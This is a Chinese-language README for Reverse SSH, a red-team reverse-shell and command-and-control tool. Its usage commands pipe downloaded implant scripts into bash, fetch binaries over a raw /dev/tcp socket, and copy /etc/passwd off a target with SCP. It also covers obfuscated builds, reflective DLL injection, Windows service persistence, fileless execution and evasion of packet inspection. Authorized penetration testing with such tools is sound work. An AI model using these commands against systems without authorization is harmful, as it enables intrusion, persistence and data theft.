
基于SSH的反向Shell管理工具,原生支持SCP/SFTP、多种传输协议、Windows DLL生成以及无文件执行,适用于红队行动。
# 反向SSH

(艺术作品致谢 https://www.instagram.com/smart.hedgehog.art/)
想要使用SSH实现反向Shell?现在你可以了。
- 使用原生SSH语法管理和连接反向Shell
- 动态、本地和远程转发
- 原生`SCP`和`SFTP`实现,用于从目标检索文件
- 完整的Windows Shell
- 多种网络传输协议,例如`http`、`websockets`、`tls`等
- 客户端与服务器相互认证,建立高信任控制通道
以及更多!```text
+----------------+ +---------+
| | | |
| | +---------+ RSSH |
| Reverse | | | Client |
| SSH server | | | |
| | | +---------+
+---------+ | | |
| | | | |
| Human | SSH | | SSH | +---------+
| Client +-------->+ <-----------------+ |
| | | | | | RSSH |
+---------+ | | | | Client |
| | | | |
| | | +---------+
| | |
| | |
+----------------+ | +---------+
| | |
| | RSSH |
+---------+ Client |
| |
+---------+
```
https://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1
- [反向 SSH](#reverse-ssh)
- [摘要](#tldr)
- [设置](#setup)
- [基本用法](#basic-usage)
- [赞助者](#sponsors)
- [个人](#individuals)
- [公司](#companies)
- [高级特性](#fancy-features)
- [权限](#privileges)
- [自动反向连接](#automatic-connect-back)
- [反向 Shell 下载(客户端生成与内置 HTTP 服务器)](#reverse-shell-download-client-generation-and-in-built-http-server)
- [替代传输(HTTP/Websockets/TLS)](#alternate-transports-httpwebsocketstls)
- [Bash 自动补全](#bash-autocomplete)
- [Windows DLL 生成](#windows-dll-generation)
- [SSH 子系统](#ssh-subsystems)
- [全部](#all)
- [Linux](#linux)
- [Windows](#windows)
- [Windows 服务集成](#windows-service-integration)
- [完整的 Windows Shell 支持](#full-windows-shell-support)
- [Webhooks](#webhooks)
- [Tun (VPN)](#tun-vpn)
- [无文件执行(客户端支持动态下载可执行文件作为 Shell 执行)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)
- [支持的 URI 方案](#supported-uri-schemes)
- [帮助](#help)
- [Windows](#windows-help)
- [Windows 与 SFTP](#windows-and-sftp)
- [会话生成错误 (0xc0000142)](#session-spawn-errors-0xc0000142)
- [使用 `--insecure` 启动服务器仍有 `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)
- [前台与后台](#foreground-vs-background)
- [捐赠、支持或回馈](#donations-support-or-giving-back)
## 摘要
### 设置
建议使用 Docker 版本,因为它包含了正确版本的 Go 语言以及 Windows 的交叉编译器。```sh
# Start the server
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh
```
或者 docker compose:```yaml
services:
reversessh:
image: reversessh/reverse_ssh
ports:
- "3232:2222"
environment:
- EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232
- RSSH_CONSOLE_LABEL=c2.label
- RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL
- SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY}
volumes:
- ./data:/data
```
### 基本用法```sh
# Connect to the server console
ssh your.rssh.server.internal -p 3232
# List all server console commands
catcher$ help
# Build a new client and host it on the in-built webserver
catcher$ link
http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25
# curl or wget this binary to a target system then execute it,
curl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh | bash
# then we can then list what clients are connected
catcher$ ls
Targets
+------------------------------------------+-----------------------------------+
| IDs | Version |
+------------------------------------------+-----------------------------------+
| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |
| fe6c52029e37185e4c7d512edd67a6c7694e2995 | |
| dummy.machine | |
| 192.168.0.11:34542 | |
+------------------------------------------+-----------------------------------+
```
所有命令都支持 `-h` 标志以显示帮助。
然后典型的 ssh 命令可以工作,只需将你的 rssh 服务器指定为跳板主机。```sh
# Connect to full shell
ssh -J your.rssh.server.internal:3232 dummy.machine
# Start remote forward
ssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine
# Start dynamic forward
ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine
# SCP
scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .
```
## Sponsors
衷心感谢以下人士向 RSSH 项目捐款,使这一切成为可能!
### Individuals
[chikamobina](https://github.com/chikamobina) 的慷慨捐赠!
[wrighterase (ctrlzero)](https://github.com/wrighterase) 的拉取请求和捐赠!
### Companies
[Carapace](https://carapace.nz/) 是一家总部位于新西兰的安全咨询公司,团队人才济济!
[<img src="https://assets.kitploit.com/production/public/readmes/5627/b077b138b5108d69a3bcb10eea9d5f195914c9fb4653689923b3a10a1ee38a64.png">](https://carapace.nz/)
## 高级功能
### 权限
RSSH 服务器支持非常基本的用户权限,在 `data-directory`/`keys`(由 `--datadir` 指定)文件夹中找到的用户(例如 `data-directory/keys/jim`)将被分配为“用户”,只能看到公开的客户端(在 authorized_controllee_keys 文件中没有 `owners` 标签,或 `owners` 标签为空)或专门分配给他们的客户端,例如 `owners="jim"`。
可以通过用户使用 `access` 命令共享其拥有的客户端访问权限,或由服务器管理员在运行时更改此设置。默认情况下,`authorized_keys` 文件中找到的任何公钥都将被标记为管理员,以保持向后兼容性。
通过 `access` 命令所做的任何更改在服务器重启后不会保留,需要编辑该特定客户端的 `authorized_controllee_keys` 文件。
### 自动回调
rssh 客户端允许您嵌入一个回调地址。
默认情况下,`link` 命令会嵌入服务器的外部地址。
如果您(出于某种原因)手动构建二进制文件,可以指定环境变量 `RSSH_HOMESERVER` 将其嵌入客户端:```sh
$ RSSH_HOMESERVER=your.rssh.server.internal:3232 make
# Will connect to your.rssh.server.internal:3232, even though no destination is specified
$ bin/client
# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client -d example.com:3232
```
### 反向 Shell 下载(客户端生成与内置 HTTP/Raw TCP 服务器)
RSSH 服务器可以构建并托管客户端二进制文件(`link` 命令)。这是构建和提供客户端的推荐方式。
为使该功能正常工作,服务器必须置于项目 `bin/` 文件夹中,因为它需要找到客户端源代码。
默认情况下,`docker` 发行版已正确配置此项,推荐使用。```sh
ssh your.rssh.server.internal -p 3232
catcher$ link -h
link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
--fingerprint Set RSSH server fingerprint will default to server public key
--garble Use garble to obfuscate the binary (requires garble to be installed)
--goarch Set the target build architecture (default runtime GOARCH)
--goarm Set the go arm variable (not set by default)
--goos Set the target build operating system (default runtime GOOS)
--http Use http polling as the underlying transport
--https Use https polling as the underlying transport
--log-level Set default output logging levels, [INFO,WARNING,ERROR,FATAL,DISABLED]
--lzma Use lzma compression for smaller binary at the cost of overhead at execution (requires upx flag to be set)
--name Set the link download url/filename (default random characters)
--no-lib-c Compile client without glibc
--ntlm-proxy-creds Set NTLM proxy credentials in format DOMAIN\\USER:PASS
--owners Set owners of client, if unset client is public all users. E.g --owners jsmith,ldavidson
--proxy Set connect proxy address to bake it
--raw-download Download over raw TCP, outputs bash downloader rather than http
--shared-object Generate shared object file
--sni When TLS is in use, set a custom SNI for the client to connect with
--stdio Use stdin and stdout as transport, will disable logging, destination after stdio:// is ignored
--tls Use TLS as the underlying transport
--upx Use upx to compress the final binary (requires upx to be installed)
--use-kerberos Instruct client to try and use kerberos ticket when using a proxy
--working-directory Set download/working directory for automatic script (i.e doing curl https://<url>.sh)
--ws Use plain http websockets as the underlying transport
--wss Use TLS websockets as the underlying transport
-C Comment to add as the public key (acts as the name)
-l List currently active download links
-o Set owners of client, if unset client is public all users. E.g --owners jsmith,ldavidson
-r Remove download link
-s Set homeserver address, defaults to server --external_address if set, or server listen address if not
# Generate a client and serve it on a named link
catcher$ link --name test
http://your.rssh.server.internal:3232/test
```
然后你可以按如下方式下载:```sh
wget http://your.rssh.server.internal:3232/test
chmod +x test
./test
```
或者你可以使用原始 TCP 下载客户端二进制文件:```sh
bash -c "exec 3<>/dev/tcp/your.rssh.server.internal/3232; echo RAWtest>&3; cat <&3" > test
```
其格式仅为 `RAW` 后跟文件名,例如这里的 `test`,rssh 可以通过 `--raw-download` 自动生成。
RSSH 服务器还支持以 `.sh`、`.py` 和 `.ps1` 结尾的 URL 路径,这些路径会生成一个可以管道输入给解释器的脚本:```sh
curl http://your.rssh.server.internal:3232/test.sh | sh
```
### 备用传输方式(HTTP/Websockets/TLS)
反向SSH服务器和客户端都支持多种传输方式,用于应对深度包检测阻止主机或网络向外发送SSH的情况。
您可以通过在客户端中以URL的形式指定回连方案来手动选择传输方式。
例如```sh
./client -d ws://your.rssh.server:3232
```
或者通过使用 `link` 命令将其内置。```sh
ssh your.rssh.server -p 3232 link --ws --name test
```
### Bash 自动补全
RSSH 服务器具有 `autocomplete` 命令,该命令与 bash 很好地集成,因此您可以在未使用服务器控制台时获得自动补全功能。
要安装它们,只需执行以下操作:```sh
ssh your.rssh.server.internal -p 3232 autocomplete --shell-completion your.rssh.server.internal:3232
```
这将返回一个自动补全,可以添加到您的 `.zshrc` 或 `.bashrc` 中
例如```sh
_RSSHCLIENTSCOMPLETION()
{
local cur=${COMP_WORDS[COMP_CWORD]}
COMPREPLY=( $(compgen -W "$(ssh your.rssh.server.internal -p 3232 autocomplete --clients)" -- $cur) )
}
_RSSHFUNCTIONSCOMPLETIONS()
{
local cur=${COMP_WORDS[COMP_CWORD]}
COMPREPLY=( $(compgen -W "$(ssh your.rssh.server.internal -p 3232 help -l)" -- $cur) )
}
complete -F _RSSHFUNCTIONSCOMPLETIONS ssh your.rssh.server.internal -p 3232
complete -F _RSSHCLIENTSCOMPLETION ssh -J your.rssh.server.internal:3232
complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 exec
complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 connect
complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 listen -c
complete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 kill
```
使您可以直接从终端进行补全。```sh
# Will give you an option based on what clients are connected
ssh -J your.rssh.server.internal:3232 <TAB>
```
### Windows DLL 生成
你可以将客户端编译为 DLL,以便通过类似 [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) 的方式加载。当你想对 rssh 客户端进行无文件注入时,这会非常有用。
如果你在 Linux 上执行此操作,则需要交叉编译器,使用 `mingw-w64-gcc`,该编译器已包含在 Docker 发布版中。```bash
# Using the link command
catcher$ link --goos windows --shared-object --name windows_dll
http://your.rssh.server.internal:3232/windows_dll
# If building manually
CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
```
### SSH 子系统
SSH 协议支持通过 `-s` 标志调用子系统。在 RSSH 中,这被重新用于为平台提供特殊命令以及 `sftp` 支持。
#### 全部
`list` 列出可用的子系统
`sftp`: 运行 sftp 处理器以传输文件
#### Linux
`setgid`: 尝试更改组
`setuid`: 尝试更改用户
#### Windows
`service`: 安装或删除 rssh 二进制文件作为 Windows 服务,需要管理员权限
例如```sh
# Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.internal:3232 test-pc.user.test-pc -s service --install
```
### Windows 服务集成
客户端 RSSH 二进制文件支持在 Windows 服务中运行,并且不会在 10 秒后超时。这对于创建持久管理服务非常有用。
### 完整的 Windows Shell 支持
大多数针对 Windows 的反弹 shell 难以生成一个支持调整大小、复制粘贴以及我们非常喜欢的所有其他功能的 shell 环境。
该项目在新版 Windows 上使用 `conpty`,在旧版 Windows 上使用 `winpty` 库(可自行解压)。这意味着几乎所有的 Windows 版本都能提供一个不错的 shell。
### Webhooks
RSSH 服务器可以发送通过终端界面的 `webhook` 命令设置的原始 HTTP 请求。
首先启用一个 webhook:```bash
$ ssh your.rssh.server.internal -p 3232
catcher$ webhook --on http://localhost:8080/
```
然后断开连接,或连接一个客户端,这将发出以下格式的 `POST` 请求。```bash
$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip
{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}%
```
此外,请注意,如果将此连接到 Discord,请使用 `/slack` 端点。
### Tun (VPN)
RSSH 和 SSH 支持创建 tuntap 接口,让你能够路由流量并创建伪 VPN。它的设置比本地或远程转发(`-L`、`-R`)稍微复杂一些,但在这种模式下,你可以发送 `UDP` 和 `ICMP`。
#### 重要提示
如果你连接到恶意的 RSSH 客户端,它可以回连到你的隧道设备。因此,重要的是不要启用转发,并要有防火墙规则来阻止对本地机器的任何连接,或者从容器/netns 内运行它。
在远程机器上安装客户端,如果你的 RSSH 客户端与你的 tun 设备在同一主机上,这将无法工作。```sh
sudo ssh -J your.rssh.server.internal:3232 user.wombo -w 0:any
sudo ip link set dev tun0 up
sudo ip route add 0.0.0.0/0 dev tun0
```
这有一些限制,它只能发送 `UDP`/`TCP`/`ICMP`,而不能发送任意第三层协议。`ICMP` 是尽力而为的,可能会使用远程主机的 `ping` 工具,因为在大多数机器上 ICMP 套接字需要特权。这也不支持 `tap` 设备,例如第二层 VPN,因为这需要管理权限。
### 无文件执行(客户端支持动态下载可执行文件以作为 shell 执行)
当指定 rssh 二进制文件应运行的可执行文件时,无论是连接完整的 PTY 会话还是原始执行,客户端都支持 URI 方案来下载外部可执行文件。
例如。```sh
connect --shell https://your.host/program <rssh_client_id>
ssh -J your.rssh.server:3232 <rssh_client_id> https://your.host/program
```
#### 支持的 URI 方案
`http/https`:纯网络下载
`rssh`:通过 rssh 服务器下载
rssh 服务器将提供可执行文件工作目录中 `downloads` 目录内的内容。
这两种方法都会适时地使用 [memfd](https://man7.org/linux/man-pages/man2/memfd_create.2.html),这不会将任何可执行文件写入磁盘。
# 帮助
## Windows
### SFTP
由于 SFTP(更确切地说是我所使用的库)的限制,在 Windows 上路径需要更多的处理。```sh
sftp -r -J your.rssh.server.internal:3232 test-pc.user.test-pc:'/C:/Windows/system32'
```
## Session spawn errors (0xc0000142)
在某些执行情况下,连接到 Windows 上的 RSSH 客户端可能会失败且不显示错误。```sh
catcher$ connect windows-system
Session has terminated.
```
客户端日志:```sh
2025/08/24 18:25:39 [client] INFO session.go:52 func16() : Session got request: "shell"
2025/08/24 18:25:39 [client] INFO shell_windows.go:137 runWithConpty() : New process with pid 3427 spawned
2025/08/24 18:25:39 [client] INFO session.go:122 func16() : Session disconnected
```
这个问题通常有两种常见原因:一是杀毒软件杀死了生成的 PowerShell 进程,二是 `0xc0000142` 表示生成的进程没有访问 Windows 工作站或桌面的权限 [来源](https://stackoverflow.com/questions/677874/starting-a-process-with-credentials-from-a-windows-service/30687230#30687230)。
要确定是哪种原因导致的问题,请在不使用 pty 的情况下执行任意命令:```sh
ssh -J rssh windows-system cmd /c dir
exit status 0xc0000142
```
如果你看到 `0xc0000142` 错误代码,尝试启动 `CMD.exe` 并强制分配一个 pty(`-t`):```sh
ssh -t -J rssh windows-system CMD.exe
```
这应该启动一个交互式外壳。
## 使用 `--insecure` 启动的服务器仍然显示 `Failed to handshake`
如果客户端二进制文件是通过 `link` 命令生成的,那么该客户端默认会嵌入服务器公钥指纹。如果你丢失了服务器私钥,客户端将无法再连接。
你也可以使用 `link --fingerprint <fingerprint here>` 来生成指定指纹的客户端,但截至版本 1.0.13,还没有办法禁用此功能。
## 前台运行 vs 后台运行
默认情况下,客户端会在后台运行,然后父进程退出,子进程将继承父进程的 stdout/stderr,因此你仍然可以看到输出。如果需要调试客户端,请使用 `--foreground` 标志。
# 捐赠、支持或回馈
回馈 RSSH 项目最简单的方式是发现 Bug、提出功能需求,以及向你认为会用到它的人口碑宣传!
当然,如果你想直接向我表达支持,可以通过 Ko-fi 或 GitHub Sponsors(右侧的“Sponsor this Project”)。
也可以通过以下钱包向我捐赠:
Monero (XMR):
`8A8TRqsBKpMMabvt5RxMhCFWcuCSZqGV5L849XQndZB4bcbgkenH8KWJUXinYbF6ySGBznLsunrd1WA8YNPiejGp3FFfPND`
Bitcoin (BTC):
`bc1qm9e9sfrm7l7tnq982nrm6khnsfdlay07h0dxfr`